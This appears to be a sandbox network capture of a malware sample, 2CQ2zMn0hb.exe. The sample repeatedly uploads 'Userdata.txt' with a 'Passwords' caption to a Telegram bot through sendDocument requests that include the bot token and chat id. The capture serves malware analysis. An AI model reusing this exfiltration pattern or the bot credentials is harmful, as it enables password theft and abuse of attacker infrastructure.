2025-01-10 20:53:49 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 32 64 62 61 32 36 31 65 37 65 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd322dba261e7eContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:50 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:50 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:50 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 35 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44735,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542430,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.5	49998	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:51 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3240cd792635 Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:51 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 34 30 63 64 37 39 32 36 33 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3240cd792635Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:51 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:51 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:51 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 36 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 31 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44736,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542431,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.5	50000	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:53 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd325276d5484d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:53 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 35 32 37 36 64 35 34 38 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd325276d5484dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:53 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:53 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:53 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 37 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 33 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44737,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542433,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.5	50002	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:54 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3266c884144d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:54 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 36 36 63 38 38 34 31 34 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3266c884144dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:55 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:55 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:55 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 38 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 35 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44738,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542435,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.5	50004	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:56 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd3279b0efee4d Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:56 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 37 39 62 30 65 66 65 65 34 64 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd3279b0efee4dContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:56 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:56 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:56 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 33 39 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 36 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44739,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542436,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.5	50006	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:58 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd328b327df4cc Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:58 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 38 62 33 32 37 64 66 34 63 63 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd328b327df4ccContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:53:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:53:58 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:53:58 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 30 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 33 38 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44740,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542438,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.5	50008	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:53:59 UTC	296	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd329dfebbbd2f Host: api.telegram.org Content-Length: 1090 Connection: Keep-Alive
2025-01-10 20:53:59 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 39 64 66 65 62 62 62 64 32 66 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd329dfebbbd2fContent-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:00 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:00 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2025-01-10 20:54:00 UTC	536	IN	Data Raw: 7b 22 6f 6b 22 3a 74 72 75 65 2c 22 72 65 73 75 6c 74 22 3a 7b 22 6d 65 73 73 61 67 65 5f 69 64 22 3a 34 34 37 34 31 2c 22 66 72 6f 6d 22 3a 7b 22 69 64 22 3a 37 37 36 36 35 37 34 39 30 35 2c 22 69 73 5f 62 6f 74 22 3a 74 72 75 65 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 4c 61 76 69 64 61 4c 6f 6b 61 5f 42 6f 74 22 7d 2c 22 63 68 61 74 22 3a 7b 22 69 64 22 3a 32 30 36 35 32 34 32 39 31 35 2c 22 66 69 72 73 74 5f 6e 61 6d 65 22 3a 22 43 6f 64 65 64 22 2c 22 75 73 65 72 6e 61 6d 65 22 3a 22 63 5f 64 65 64 22 2c 22 74 79 70 65 22 3a 22 70 72 69 76 61 74 65 22 7d 2c 22 64 61 74 65 22 3a 31 37 33 36 35 34 32 34 34 30 2c 22 64 6f 63 75 6d 65 6e 74 22 3a 7b 22 66 69 6c 65 5f 6e 61 6d 65 22 3a 22 55 Data Ascii: {"ok":true,"result":{"message_id":44741,"from":{"id":7766574905,"is_bot":true,"first_name":"Lavida","username":"LavidaLoka_Bot"},"chat":{"id":2065242915,"first_name":"Coded","username":"c_ded","type":"private"},"date":1736542440,"document":{"file_name":"U

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.5	50010	149.154.167.220	443	2672	C:\Users\user\Desktop\2CQ2zMn0hb.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-10 20:54:01 UTC	272	OUT	POST /bot7766574905:AAGkK12NqfgMWNTsNJqrFtr2J3oH0W_DuqA/sendDocument?chat_id=2065242915&caption=user%20/%20Passwords%20/%208.46.123.189 HTTP/1.1 Content-Type: multipart/form-data; boundary================8dd32b213189091 Host: api.telegram.org Content-Length: 1090
2025-01-10 20:54:01 UTC	1090	OUT	Data Raw: 2d 2d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 38 64 64 33 32 62 32 31 33 31 38 39 30 39 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 55 73 65 72 64 61 74 61 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 78 2d 6d 73 2d 64 6f 73 2d 65 78 65 63 75 74 61 62 6c 65 0d 0a 0d 0a 0d 0a 0d 0a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 2a 0d 0a 2a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: --===============8dd32b213189091Content-Disposition: form-data; name="document"; filename="Userdata.txt"Content-Type: application/x-ms-dos-executable************************************************************
2025-01-10 20:54:02 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Fri, 10 Jan 2025 20:54:01 GMT Content-Type: application/json Content-Length: 536 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
